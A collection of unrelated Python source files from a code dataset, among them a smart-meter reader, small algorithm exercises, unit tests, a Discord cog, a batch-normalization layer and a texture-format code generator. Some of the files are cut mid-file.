pana_ts = time.time() # タイムスタンプを保存
sys.stdout.write('Successfully done.\n')
time.sleep(3)
pana_done = True
break
elif time.time() - st > 15: # PANA認証失敗によるタイムアウト
sys.stdout.write('Fail to connect.\n')
sem_exist = False
pana_done = False
break
else:
time.sleep(0.1)
if pana_done:
break
if sem_exist:
sem = EchonetLiteSmartEnergyMeter()
get_list = ['operation_status', 'location', 'version', 'fault_status',
'manufacturer_code', 'production_no',
'current_time', 'current_date',
'get_pty_map', 'set_pty_map', 'chg_pty_map',
'epc_coefficient', 'digits', 'unit_amount_energy', 'amount_energy_normal',
'recent_amount_energy_norm', 'hist_amount_energy1_norm']
for epc in get_list: # 各種データ取得
edt = False
for i in range(10):
data = sem_get_getres(epc)
if data:
parsed_data = sem.parse_frame(data)
if parsed_data:
edt = parsed_data['ptys'][0]['edt']
break
else:
continue # Get失敗 再試行
else: # Get失敗 再試行
continue
if edt:
if epc == 'operation_status':
result = True if edt == b'\x30' else False
elif epc == 'location':
result = binascii.b2a_hex(edt)
elif epc == 'version':
result = edt[2:3].decode()
elif epc == 'manufacturer_code':
result = binascii.b2a_hex(edt)
elif epc == 'production_no':
result = binascii.b2a_hex(edt)
elif epc == 'current_time':
hour = int.from_bytes(edt[0:1], 'big')
min = int.from_bytes(edt[1:2], 'big')
result = datetime.time(hour, min)
elif epc == 'current_date':
year = int.from_bytes(edt[0:2], 'big')
month = int.from_bytes(edt[2:3], 'big')
day = int.from_bytes(edt[3:4], 'big')
result = datetime.date(year, month, day)
elif epc == 'fault_status':
result = True if edt == b'\x42' else False
elif epc == 'get_pty_map':
result = binascii.b2a_hex(edt)
elif epc == 'set_pty_map':
result = binascii.b2a_hex(edt)
elif epc == 'chg_pty_map':
result = binascii.b2a_hex(edt)
elif epc == 'epc_coefficient':
result = int.from_bytes(edt, 'big')
elif epc == 'digits':
result = int.from_bytes(edt, 'big')
elif epc == 'unit_amount_energy':
if edt == b'\x00':
result = 1.0
elif edt == b'\x01':
result = 0.1
elif edt == b'\x02':
result = 0.01
elif edt == b'\x03':
result = 0.001
elif edt == b'\x04':
result = 0.0001
elif edt == b'\x0A':
result = 10.0
elif edt == b'\x0B':
result = 100.0
elif edt == b'\x0C':
result = 1000.0
elif edt == b'\x0D':
result = 10000.0
else:
result = 0.0
elif epc == 'amount_energy_normal':
result = int.from_bytes(edt, 'big')
result *= sem_info['epc_coefficient'] * sem_info['unit_amount_energy']
elif epc == 'recent_amount_energy_norm':
dt = sem.parse_datetime(edt[0:7])
energy = int.from_bytes(edt[7:11], 'big')
energy *= sem_info['epc_coefficient'] * sem_info['unit_amount_energy']
result = [dt, energy]
elif epc == 'hist_amount_energy1_norm':
result = binascii.b2a_hex(edt)
sem_info[epc] = result
sys.stdout.write('[Get]: {}, {}\n'.format(epc, result))
else: # Get失敗x10
sys.stdout.write('[Error]: Can not get {}.\n'.format(epc))
sem_exist = False
break
if sem_exist:
start = time.time() - 1000 # 初期値を1000s前に設定
while True:
try:
pana_done = False
if (time.time() - pana_ts > 12 * 60 * 60): # 12時間毎にPANA認証を更新
sys.stdout.write('PANA re-connection...\n')
sem_exist = y3.restart_pac()
if sem_exist: # インスタンスリスト通知の受信待ち
st = time.time()
while True:
if sem_inf_list:
pana_ts = time.time() # タイムスタンプを保存
pana_done = True
sys.stdout.write('Successfully done.\n')
time.sleep(3)
break
elif time.time() - st > 15: # PANA認証失敗によるタイムアウト
sys.stdout.write('Fail to connect.\n')
break
else:
time.sleep(0.1)
if not pana_done:
break # PANA認証失敗でbreakする
while True:
if (time.time() - start) >= user_conf.SEM_INTERVAL:
start = time.time()
break
else:
time.sleep(0.1)
sem_get('instant_power') # Get
while True: # GetRes待ちループ
rcd_time = time.time() # rcd_time[s]
new_dt = datetime.datetime.fromtimestamp(rcd_time)
# ログファイルメンテナンス
pow_logfile_maintainance(saved_dt, new_dt)
saved_dt = new_dt
if y3.get_queue_size():
msg_list = y3.dequeue_message()
if msg_list['COMMAND'] == 'ERXUDP':
led.oneshot()
parsed_data = sem.parse_frame(msg_list['DATA'])
if parsed_data:
if parsed_data['tid'] != tid_counter:
errmsg = '[Error]: ECHONET Lite TID mismatch\n'
sys.stdout.write(errmsg)
else:
watt_int = int.from_bytes(parsed_data['ptys'][0]['edt'], 'big', signed=True)
sys.stdout.write('[{:5d}] {:4d} W\n'.format(tid_counter, watt_int))
sys.stdout.flush()
with open(CURR_POW_FILE, 'w') as fs:
fs.write(str(watt_int))
try: # 一時ログファイルに書き込み
f = open(TMP_LOG_FILE, 'a') # rcd_time[ms] (JavaScript用)
f.write('{},{}\n'.format(round(rcd_time), watt_int))
f.close()
except:
sys.stdout.write('[Error]: can not write to file.\n')
if sock: # UNIXドメインソケットで送信
sock_data = json.dumps({'time': rcd_time, 'power': watt_int}).encode('utf-8')
try:
sock.send(sock_data)
except:
sys.stdout.write('[Error]: Broken socket.\n')
break
else: # 電文が壊れている
errmsg = '[Error]: ECHONET Lite frame error\n'
sys.stdout.write(errmsg)
else: # 電文が壊れている???
errmsg = '[Error]: Unknown data received.\n'
sys.stdout.write(errmsg)
else: # GetRes待ち
while sem_inf_list:
inf = sem_inf_list.pop(0)
sys.stdout.write('[Inf]: {}\n'.format(inf['DATA']))
if time.time() - start > 20: # GetRes最大待ち時間: 20s
sys.stdout.write('[Error]: Time out.\n')
try: # 一時ログファイルに書き込み
f = open(TMP_LOG_FILE, 'a')
f.write('{},None\n'.format(round(rcd_time)))
f.close()
except:
sys.stdout.write('[Error]: can not write to file.\n')
break
time.sleep(0.1)
except KeyboardInterrupt:
break
else:
sys.stdout.write('[Error]: Can not connect with a smart energy meter.\n')
# 終了処理
if sock:
try:
sock.close()
except:
sys.stdout.write('[Error]: Broken socket.\n')
sys.stdout.write('\nWi-SUN reset...\n')
y3reset()
y3.terminate()
y3.uart_close()
led.terminate()
gpio.cleanup()
if os.path.exists(TMP_LOG_FILE):
os.remove(TMP_LOG_FILE)
sys.stdout.write('Bye.\n')
sys.exit(0)
| StarcoderdataPython |
1623868 |
fileLines = open('exercise101.py','r')
lines = fileLines.readlines()
for line in range(len(lines)-1,0, -1):
lineStr = lines[line]
if len(lineStr.strip()) > 0 :
print(lineStr, end="") | StarcoderdataPython |
3350123 | <gh_stars>1-10
def solution(r):
answer = 0
for i in range(1, r):
for j in range(1, r):
if i ** 2 + j ** 2 <= r ** 2:
answer += 1
return answer * 4
def main():
r = int(input())
print(solution(r))
if __name__ == '__main__':
main()
| StarcoderdataPython |
192991 | import math
from tf_pwa.err_num import *
def test_add():
a = NumberError(1.0, 0.3)
b = NumberError(2.0, 0.4)
c = a + b
assert c.value == 3.0
assert c.error == 0.5
d = b - a
assert d.value == 1.0
assert d.error == 0.5
e = -a
assert e.value == -1.0
assert e.error == 0.3
f = a - 1.0
d = a + 3.0
def test_mul():
a = NumberError(3.0, 0.3)
b = NumberError(2.0, 0.4)
c = a * b
assert c.value == 6.0
assert c.error == math.sqrt(1.8)
d = a / b
assert d.value == 1.5
assert d.error == math.sqrt(0.1125)
e = b ** 3
assert e.value == 8.0
assert abs(e.error - math.sqrt(23.04)) < 1e-7
f = b ** a
g = 3.0 ** a
def test_exp():
a = NumberError(3.0, 0.3)
b = NumberError(2.0, 0.4)
c = a.exp()
d = b.log()
e = a.apply(math.sqrt)
g = a.apply(math.sin, math.cos)
print(g)
def test_cal_err():
a = NumberError(3.0, 0.3)
b = NumberError(2.0, 0.3)
f = lambda x: x * 3.0 + x ** 2 * 2.0 + 1.0
c = cal_err(f, a)
g = lambda x, y: x + y + (x - y) * (x + y)
d = cal_err(g, a, b)
e = cal_err(g, 3.0, b)
h = cal_err(g, a, 2.0)
assert d.value == e.value
assert e.value == h.value
| StarcoderdataPython |
1793278 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 26 16:56:08 2018
@author: lenovo
"""
from sklearn.svm import SVC
clf = SVC()
clf.fit(sel.x_train, sel.y_train)
pred=clf.predict(test_data)
pred[pred==1]=0
pred[pred==3]=1
a=pred-test_label.T
a=a.T
sum(a==0)/206 | StarcoderdataPython |
3375166 | <gh_stars>1000+
class UnableToReadBaselineError(ValueError):
"""Think of this as a 404, if getting a baseline had a HTTPError code."""
pass
class InvalidBaselineError(ValueError):
"""Think of this as a 400, if getting a baseline had a HTTPError code."""
pass
class InvalidFile(ValueError):
"""Think of this as a 400, if FileNotFoundError was a 404 HTTPError code."""
pass
class SecretNotFoundOnSpecifiedLineError(Exception):
def __init__(self, line: int) -> None:
super().__init__(
'ERROR: Secret not found on line {}!\n'.format(line)
+ 'Try recreating your baseline to fix this issue.',
)
class NoLineNumberError(Exception):
def __init__(self) -> None:
super().__init__(
'ERROR: No line numbers found in baseline! Line numbers are needed '
'for auditing secret occurrences. Try recreating your baseline to fix '
'this issue.',
)
| StarcoderdataPython |
49264 | from __future__ import annotations
from edutorch.typing import NPArray
from .batchnorm import BatchNorm
class SpatialBatchNorm(BatchNorm):
def forward(self, x: NPArray) -> NPArray:
"""
Computes the forward pass for spatial batch normalization.
Inputs:
- x: Input data of shape (N, C, H, W)
- gamma: Scale parameter, of shape (C,)
- beta: Shift parameter, of shape (C,)
- bn_param: Dictionary with the following keys:
- mode: 'train' or 'test'; required
- eps: Constant for numeric stability
- momentum: Constant for running mean / variance. momentum=0 means that
old information is discarded completely at every time step, while
momentum=1 means that new information is never incorporated. The
default of momentum=0.9 should work well in most situations.
- running_mean: Array of shape (D,) giving running mean of features
- running_var Array of shape (D,) giving running variance of features
Returns a tuple of:
- out: Output data, of shape (N, C, H, W)
- cache: Values needed for the backward pass
"""
N, C, H, W = x.shape
x_flat = x.transpose(0, 2, 3, 1).reshape(-1, C)
out_flat = super().forward(x_flat)
out = out_flat.reshape(N, H, W, C).transpose(0, 3, 1, 2)
return out
def backward(self, dout: NPArray) -> tuple[NPArray, ...]:
"""
Computes the backward pass for spatial batch normalization.
Inputs:
- dout: Upstream derivatives, of shape (N, C, H, W)
- cache: Values from the forward pass
Returns a tuple of:
- dx: Gradient with respect to inputs, of shape (N, C, H, W)
- dgamma: Gradient with respect to scale parameter, of shape (C,)
- dbeta: Gradient with respect to shift parameter, of shape (C,)
"""
N, C, H, W = dout.shape
dout_flat = dout.transpose(0, 2, 3, 1).reshape(-1, C)
dx_flat, dgamma, dbeta = super().backward(dout_flat)
dx = dx_flat.reshape(N, H, W, C).transpose(0, 3, 1, 2)
return dx, dgamma, dbeta
| StarcoderdataPython |
4814464 | #!/usr/bin/python
# Copyright 2015 The ANGLE Project Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# gen_texture_format_table.py:
# Code generation for texture format map
#
import json
import pprint
template = """// GENERATED FILE - DO NOT EDIT.
// Generated by gen_texture_format_table.py using data from texture_format_data.json
//
// Copyright 2015 The ANGLE Project Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
//
// texture_format_table:
// Queries for full textureFormat information based in internalFormat
//
#include "libANGLE/renderer/d3d/d3d11/texture_format_table.h"
#include "libANGLE/renderer/d3d/d3d11/formatutils11.h"
#include "libANGLE/renderer/d3d/d3d11/internal_format_initializer_table.h"
#include "libANGLE/renderer/d3d/d3d11/load_functions_table.h"
#include "libANGLE/renderer/d3d/d3d11/renderer11_utils.h"
#include "libANGLE/renderer/d3d/d3d11/swizzle_format_info.h"
#include "libANGLE/renderer/d3d/loadimage.h"
namespace rx
{{
namespace d3d11
{{
namespace
{{
typedef bool (*FormatSupportFunction)(const Renderer11DeviceCaps &);
bool AnyDevice(const Renderer11DeviceCaps &deviceCaps)
{{
return true;
}}
bool OnlyFL10Plus(const Renderer11DeviceCaps &deviceCaps)
{{
return (deviceCaps.featureLevel >= D3D_FEATURE_LEVEL_10_0);
}}
bool OnlyFL9_3(const Renderer11DeviceCaps &deviceCaps)
{{
return (deviceCaps.featureLevel == D3D_FEATURE_LEVEL_9_3);
}}
template <DXGI_FORMAT format, bool requireSupport>
bool SupportsFormat(const Renderer11DeviceCaps &deviceCaps)
{{
// Must support texture, SRV and RTV support
UINT mustSupport = D3D11_FORMAT_SUPPORT_TEXTURE2D | D3D11_FORMAT_SUPPORT_TEXTURECUBE |
D3D11_FORMAT_SUPPORT_SHADER_SAMPLE | D3D11_FORMAT_SUPPORT_MIP |
D3D11_FORMAT_SUPPORT_RENDER_TARGET;
if (d3d11_gl::GetMaximumClientVersion(deviceCaps.featureLevel) > 2)
{{
mustSupport |= D3D11_FORMAT_SUPPORT_TEXTURE3D;
}}
bool fullSupport = false;
if (format == DXGI_FORMAT_B5G6R5_UNORM)
{{
// All hardware that supports DXGI_FORMAT_B5G6R5_UNORM should support autogen mipmaps, but
// check anyway.
mustSupport |= D3D11_FORMAT_SUPPORT_MIP_AUTOGEN;
fullSupport = ((deviceCaps.B5G6R5support & mustSupport) == mustSupport);
}}
else if (format == DXGI_FORMAT_B4G4R4A4_UNORM)
{{
fullSupport = ((deviceCaps.B4G4R4A4support & mustSupport) == mustSupport);
}}
else if (format == DXGI_FORMAT_B5G5R5A1_UNORM)
{{
fullSupport = ((deviceCaps.B5G5R5A1support & mustSupport) == mustSupport);
}}
else
{{
UNREACHABLE();
return false;
}}
// This 'SupportsFormat' function is used by individual entries in the D3D11 Format Map below,
// which maps GL formats to DXGI formats.
if (requireSupport)
{{
// This means that ANGLE would like to use the entry in the map if the inputted DXGI format
// *IS* supported.
// e.g. the entry might map GL_RGB5_A1 to DXGI_FORMAT_B5G5R5A1, which should only be used if
// DXGI_FORMAT_B5G5R5A1 is supported.
// In this case, we should only return 'true' if the format *IS* supported.
return fullSupport;
}}
else
{{
// This means that ANGLE would like to use the entry in the map if the inputted DXGI format
// *ISN'T* supported.
// This might be a fallback entry. e.g. for ANGLE to use DXGI_FORMAT_R8G8B8A8_UNORM if
// DXGI_FORMAT_B5G5R5A1 isn't supported.
// In this case, we should only return 'true' if the format *ISN'T* supported.
return !fullSupport;
}}
}}
// End Format Support Functions
// For sized GL internal formats, there are several possible corresponding D3D11 formats depending
// on device capabilities.
// This function allows querying for the DXGI texture formats to use for textures, SRVs, RTVs and
// DSVs given a GL internal format.
const TextureFormat GetD3D11FormatInfo(GLenum internalFormat,
DXGI_FORMAT texFormat,
DXGI_FORMAT srvFormat,
DXGI_FORMAT rtvFormat,
DXGI_FORMAT dsvFormat)
{{
TextureFormat info;
info.texFormat = texFormat;
info.srvFormat = srvFormat;
info.rtvFormat = rtvFormat;
info.dsvFormat = dsvFormat;
// Given a GL internal format, the renderFormat is the DSV format if it is depth- or
// stencil-renderable,
// the RTV format if it is color-renderable, and the (nonrenderable) texture format otherwise.
if (dsvFormat != DXGI_FORMAT_UNKNOWN)
{{
info.renderFormat = dsvFormat;
}}
else if (rtvFormat != DXGI_FORMAT_UNKNOWN)
{{
info.renderFormat = rtvFormat;
}}
else if (texFormat != DXGI_FORMAT_UNKNOWN)
{{
info.renderFormat = texFormat;
}}
else
{{
info.renderFormat = DXGI_FORMAT_UNKNOWN;
}}
// Compute the swizzle formats
const gl::InternalFormat &formatInfo = gl::GetInternalFormatInfo(internalFormat);
if (internalFormat != GL_NONE && formatInfo.pixelBytes > 0)
{{
if (formatInfo.componentCount != 4 || texFormat == DXGI_FORMAT_UNKNOWN ||
srvFormat == DXGI_FORMAT_UNKNOWN || rtvFormat == DXGI_FORMAT_UNKNOWN)
{{
// Get the maximum sized component
unsigned int maxBits = 1;
if (formatInfo.compressed)
{{
unsigned int compressedBitsPerBlock = formatInfo.pixelBytes * 8;
unsigned int blockSize =
formatInfo.compressedBlockWidth * formatInfo.compressedBlockHeight;
maxBits = std::max(compressedBitsPerBlock / blockSize, maxBits);
}}
else
{{
maxBits = std::max(maxBits, formatInfo.alphaBits);
maxBits = std::max(maxBits, formatInfo.redBits);
maxBits = std::max(maxBits, formatInfo.greenBits);
maxBits = std::max(maxBits, formatInfo.blueBits);
maxBits = std::max(maxBits, formatInfo.luminanceBits);
maxBits = std::max(maxBits, formatInfo.depthBits);
}}
maxBits = roundUp(maxBits, 8U);
const SwizzleFormatInfo &swizzleInfo =
GetSwizzleFormatInfo(maxBits, formatInfo.componentType);
info.swizzleTexFormat = swizzleInfo.mTexFormat;
info.swizzleSRVFormat = swizzleInfo.mSRVFormat;
info.swizzleRTVFormat = swizzleInfo.mRTVFormat;
}}
else
{{
// The original texture format is suitable for swizzle operations
info.swizzleTexFormat = texFormat;
info.swizzleSRVFormat = srvFormat;
info.swizzleRTVFormat = rtvFormat;
}}
}}
else
{{
// Not possible to swizzle with this texture format since it is either unsized or GL_NONE
info.swizzleTexFormat = DXGI_FORMAT_UNKNOWN;
info.swizzleSRVFormat = DXGI_FORMAT_UNKNOWN;
info.swizzleRTVFormat = DXGI_FORMAT_UNKNOWN;
}}
// Check if there is an initialization function for this texture format
info.dataInitializerFunction = GetInternalFormatInitializer(internalFormat, texFormat);
// Gather all the load functions for this internal format
info.loadFunctions = GetLoadFunctionsMap(internalFormat, texFormat);
ASSERT(info.loadFunctions.size() != 0 || internalFormat == GL_NONE);
return info;
}}
}} // namespace
TextureFormat::TextureFormat()
: texFormat(DXGI_FORMAT_UNKNOWN),
srvFormat(DXGI_FORMAT_UNKNOWN),
rtvFormat(DXGI_FORMAT_UNKNOWN),
dsvFormat(DXGI_FORMAT_UNKNOWN),
renderFormat(DXGI_FORMAT_UNKNOWN),
swizzleTexFormat(DXGI_FORMAT_UNKNOWN),
swizzleSRVFormat(DXGI_FORMAT_UNKNOWN),
swizzleRTVFormat(DXGI_FORMAT_UNKNOWN),
dataInitializerFunction(NULL),
loadFunctions()
{{
}}
const TextureFormat &GetTextureFormatInfo(GLenum internalFormat,
const Renderer11DeviceCaps &renderer11DeviceCaps)
{{
// clang-format off
switch (internalFormat)
{{
{data}
default:
break;
}}
// clang-format on
static const TextureFormat defaultInfo;
return defaultInfo;
}} // GetTextureFormatInfo
}} // namespace d3d11
}} // namespace rx
"""
tex_format = "texFormat"
srv_format = "srvFormat"
rtv_format = "rtvFormat"
dsv_format = "dsvFormat"
def get_texture_format_item(idx, texture_format):
table_data = '';
if idx == 0:
table_data += ' if (' + texture_format["requirementsFcn"] + '(renderer11DeviceCaps))\n'
else:
table_data += ' else if (' + texture_format["requirementsFcn"] + '(renderer11DeviceCaps))\n'
table_data += ' {\n'
table_data += ' static const TextureFormat textureFormat = GetD3D11FormatInfo(internalFormat,\n'
table_data += ' ' + texture_format[tex_format] + ',\n'
table_data += ' ' + texture_format[srv_format] + ',\n'
table_data += ' ' + texture_format[rtv_format] + ',\n'
table_data += ' ' + texture_format[dsv_format] + ');\n'
table_data += ' return textureFormat;\n'
table_data += ' }\n'
return table_data
def parse_json_into_switch_string(json_data):
table_data = ''
for internal_format_item in sorted(json_data.iteritems()):
internal_format = internal_format_item[0]
table_data += ' case ' + internal_format + ':\n'
table_data += ' {\n'
for idx, texture_format in enumerate(sorted(json_data[internal_format])):
table_data += get_texture_format_item(idx, texture_format)
table_data += ' else\n'
table_data += ' {\n'
table_data += ' break;\n'
table_data += ' }\n'
table_data += ' }\n'
return table_data
with open('texture_format_data.json') as texture_format_json_file:
texture_format_data = texture_format_json_file.read();
texture_format_json_file.close()
json_data = json.loads(texture_format_data)
table_data = parse_json_into_switch_string(json_data)
output = template.format(data=table_data)
with open('texture_format_table_autogen.cpp', 'wt') as out_file:
out_file.write(output)
out_file.close()
| StarcoderdataPython |
1630216 | <reponame>Zhenye-Na/LxxxCode<gh_stars>10-100
class Solution:
"""
@param: nums: An integer array
@return: A list of integers includes the index of the first number and the index of the last number
"""
def continuousSubarraySum(self, nums):
# write your code here
if not nums or len(nums) == 0:
return [0, 0]
prefix_sum, min_sum, max_sum = 0, 0, -sys.maxsize
i, j, min_idx = -1, -1, -1
for idx, num in enumerate(nums):
prefix_sum += num
if prefix_sum - min_sum > max_sum:
max_sum = prefix_sum - min_sum
i, j = min_idx + 1, idx
if prefix_sum < min_sum:
min_sum = prefix_sum
min_idx = idx
return [i, j]
| StarcoderdataPython |
4841846 | # type: ignore
__all__ = ["conda_search_reqs"]
def conda_search_reqs(requirements) -> set:
conda_reqs = set()
for req in requirements.registered_imports:
# look up req (imported module name) in database compiled in advance
pass
return conda_reqs
| StarcoderdataPython |
15058 | import sys
import io
input_txt = """
44
"""
sys.stdin = io.StringIO(input_txt)
tmp = input()
# copy the below part and paste to the submission form.
# ---------function------------
def fibonacci(n):
if n <= 1:
return 1
fib_array = [1] * 45
for i in range(2, n+1):
fib_array[i] = fib_array[i-1] + fib_array[i-2]
return fib_array[n]
def main():
n = int(input())
fib = fibonacci(n)
print(fib)
return
main()
# -----------------------------
sys.stdin = sys.__stdin__
| StarcoderdataPython |
196377 | <gh_stars>1-10
import discord
from discord.ext import commands
from datetime import datetime
class ChannelCommands(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
@commands.has_permissions(manage_channels=True)
async def lock(self, ctx, channel : discord.TextChannel=None):
channel = channel or ctx.channel
overwrite = channel.overwrites_for(ctx.guild.default_role)
overwrite.send_messages = False
await channel.set_permissions(ctx.guild.default_role, overwrite=overwrite)
await ctx.send('Channel locked.')
@commands.command()
@commands.has_permissions(manage_channels=True)
async def unlock(self, ctx):
await ctx.channel.set_permissions(ctx.guild.default_role, send_messages=True)
await ctx.send(ctx.channel.mention + " ***has been unlocked.***")
# Channel Errors
# @lock.error
# async def lock_error(ctx, error):
# if isinstance(error,commands.CheckFailure):
# await ctx.send('You do not have permission to use this command!')
def setup(client):
client.add_cog(ChannelCommands(client))
| StarcoderdataPython |
3286050 | <reponame>alexbigkid/ingredients_for_cooking<gh_stars>0
"""Main program for displaying ingredients list for shopping with the recipes liked"""
# Standard library imports
import sys
# Third party imports
from colorama import Fore, Style
# Local application imports
from ingredients_input import IngredientsInput
from search_recipes_by_ingredients import SearchRecipesByIngredients
from recipe_view import RecipeView
from shopping_list import ShoppingList
from recipe_price_breakdown import RecipePriceBreakdown
def get_ingredients():
ingredients_input = IngredientsInput()
ingredients_input.ask_for_ingredients()
return ingredients_input.read_input()
def get_recipes(ingredients):
search_recipes = SearchRecipesByIngredients()
return search_recipes.get_recipes(ingredients)
def get_liked_recipes(recipes):
recipe_selection = RecipeView(recipes)
recipe_selection.show_recipe_list()
return recipe_selection.get_liked_recipe_list()
def get_price_info(liked_recipe_list):
recipe_price = RecipePriceBreakdown(liked_recipe_list)
return recipe_price.get_price_breakdown()
def show_shopping_list(liked_recipe_list, price_info_list):
shopping_list = ShoppingList(liked_recipe_list, price_info_list)
shopping_list.print_price_per_recipe()
shopping_list.print_final_result()
def main():
exit_code = 0
try:
ingredient_list = get_ingredients()
# ingredient_list = ['garlic', 'ginger', 'granny smith apple']
recipe_list = get_recipes(ingredient_list)
liked_recipe_list = get_liked_recipes(recipe_list)
price_info_list = get_price_info(liked_recipe_list)
show_shopping_list(liked_recipe_list, price_info_list)
except Exception as exception:
print(Fore.RED + f"ERROR: executing getting recipes with your favorite ingredients")
print(f"{exception}{Style.RESET_ALL}")
exit_code = 1
sys.exit(exit_code)
if __name__ == '__main__':
main()
| StarcoderdataPython |
107791 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
requirements = ('numpy', 'opencv-python', 'solt==0.1.8', 'pyyaml',
'torch>=1.3.1', 'tqdm', 'scikit-learn', 'tensorboard', 'dill', 'matplotlib',
'pandas', 'pretrainedmodels', 'pillow==6.1',
'segmentation-models-pytorch')
setup_requirements = ()
test_requirements = ('pytest',)
description = """Deep Learning framework for reproducible science. From Finland with love."""
setup(
author="<NAME>, <NAME>, <NAME>",
author_email='<EMAIL>, <EMAIL>, <EMAIL>,',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux'
],
description="Deep Learning Framework for Reproducible Science",
install_requires=requirements,
license="MIT license",
long_description=description,
include_package_data=True,
keywords='data augmentations, deeep learning',
name='collagen',
packages=find_packages(include=['collagen']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/MIPT-Oulu/Collagen',
version='0.0.1',
zip_safe=False,
)
| StarcoderdataPython |
3221976 | #!/usr/bin/python3
# INP 1A Nancy Tetris
import pygame
pygame.init()
pygame.font.init()
from game import Game
game = Game()
game.run() | StarcoderdataPython |
3392357 | <reponame>vt-sailbot/sailbot<gh_stars>1-10
import socket, sys, json, time, modules.utils, autonomous, logging
from modules.utils import SocketType, socket_connect
logger = logging.getLogger('log')
# Define the global values, as generated by the configuration file
values = {}
def main():
arduino_sock = socket_connect(SocketType.arduino)
rudder_sock = socket_connect(SocketType.rudder)
winch_sock = socket_connect(SocketType.winch)
logger.debug('Built sockets!')
time.sleep(1)
logger.info('Starting sail boat RC control!')
time.sleep(2)
# Enter the main loop
while True:
try:
arduino_sock.send(str(0).encode('utf-8'))
states = json.loads(arduino_sock.recv(128).decode('utf-8'))
rudder_angle = float(states['rudder']) * float(values['max_rudder_angle'])
winch_angle = (float(states['winch']) * 20) + 60
set_angle(rudder_sock, rudder_angle)
set_angle(winch_sock, winch_angle)
logger.info("Set %0.5f and %0.5f" % (winch_angle, rudder_angle))
if states['switch']:
generate_error('Leaving manual control for autonomous!')
autonomous.main()
generate_error('Manual control caught exited autonomous process! Continuing!')
except Exception as e:
logger.error("%r error!" % (e.__class__.__name__))
time.sleep(0.25)
# Define servo control methods
def set_angle(connection, angle):
connection.send(str(angle).encode('utf-8'))
if __name__ == '__main__':
modules.utils.setup_config(values)
if values['debug']:
modules.utils.setup_logging()
modules.utils.setup_terminal_logging()
logger.debug('Read configuration values!')
try:
main()
except:
logger.critical("Shutting down!")
time.sleep(2)
modules.utils.shutdown_terminal()
| StarcoderdataPython |
3386092 | <filename>examples/matplotlib_chart.py
# Make it run from the examples directory
import sys
sys.path.append("..")
import pandas as pd
import numpy as np
from liquer import *
import liquer.ext.lq_pandas
import liquer.ext.lq_matplotlib
from flask import Flask
import liquer.blueprint as bp
app = Flask(__name__)
app.register_blueprint(bp.app, url_prefix='/liquer')
@app.route('/')
@app.route('/index.html')
def index():
return """<h1><a href="https://matplotlib.org/">Matplotlib</a> chart app</h1>
<ul>
<li><a href="/liquer/q/data/data.html">data</a></li>
<li><a href="/liquer/q/data/data.csv">data (csv)</a></li>
<li><a href="/liquer/q/data/mpl-xy-xcol-ycol">chart</a></li>
<li><a href="/liquer/q/data/mpl-xy-xcol-ycol">chart</a></li>
<li><a href="/liquer/q/sin_cos_chart/sin_cos_chart.png">png</a>,
<a href="/liquer/q/sin_cos_chart/sin_cos_chart.svg">svg</a>,
<a href="/liquer/q/sin_cos_chart/sin_cos_chart.pdf">pdf</a></li>
</ul>
"""
@first_command
def data():
x = np.linspace(0,2*np.pi,100)
y = np.sin(x)
return pd.DataFrame(dict(xcol=x,ycol=y))
@first_command
def sin_cos_chart():
import matplotlib.pyplot as plt
x = np.linspace(0,2*np.pi,100)
fig, ax = plt.subplots()
ax.plot(x,np.sin(x))
ax.plot(x,np.cos(x))
return fig
if __name__ == '__main__':
evaluate_and_save("data/mpl-xy-xcol-ycol/matplotlib_chart.png")
# evaluate_and_save("sin_cos_chart/sin_cos_chart.png")
# evaluate_and_save("sin_cos_chart/sin_cos_chart.pdf")
app.run() | StarcoderdataPython |
3200792 | # EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: <NAME>
#
# Python Class: Base class for ***
#
# License:
# ==============================================================================
# Copyright 2007-2016 Technische Universitaet Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
import shutil
from datetime import datetime
from os import chdir
from Base import IHost
from lib.Functions import Init
from lib.Parser import ParserException
from Base.Exceptions import CommonException, SkipableCommonException
from Base.Logging import ILogable
from Base.Project import ToolChain, Tool, VHDLVersion, Environment
from DataBase.Solution import VirtualProject, FileListFile
__api__ = [
'to_time',
'Shared'
]
__all__ = __api__
# local helper function
def to_time(seconds):
"""
Convert *n* seconds to a :py:class:`str` with this pattern: "{min}:{sec:02}".
:type seconds: int
:param seconds: Number of seconds to be converted.
:rtype: str
:return: Returns a string formatted as #:##. E.g. "1:05"
"""
minutes = int(seconds / 60)
seconds = seconds - (minutes * 60)
return "{min}:{sec:02}".format(min=minutes, sec=seconds)
class Shared(ILogable):
"""
Base class for Simulator and Compiler.
:type host: object
:param host: The hosting instance for this instance.
:type dryRun: bool
:param dryRun: Enable dry-run mode
:type noCleanUp: bool
:param noCleanUp: Don't clean up after a run.
"""
ENVIRONMENT = Environment.Any
TOOL_CHAIN = ToolChain.Any
TOOL = Tool.Any
VHDL_VERSION = VHDLVersion.VHDL2008
class __Directories__:
Working = None
PoCRoot = None
def __init__(self, host : IHost, dryRun):
ILogable.__init__(self, host.Logger if isinstance(host, ILogable) else None)
self._host = host
self._dryRun = dryRun
self._pocProject = None
self._directories = self.__Directories__()
self._toolChain = None
self._vhdlVersion = self.VHDL_VERSION
self._vhdlGenerics = None
self._testSuite = None
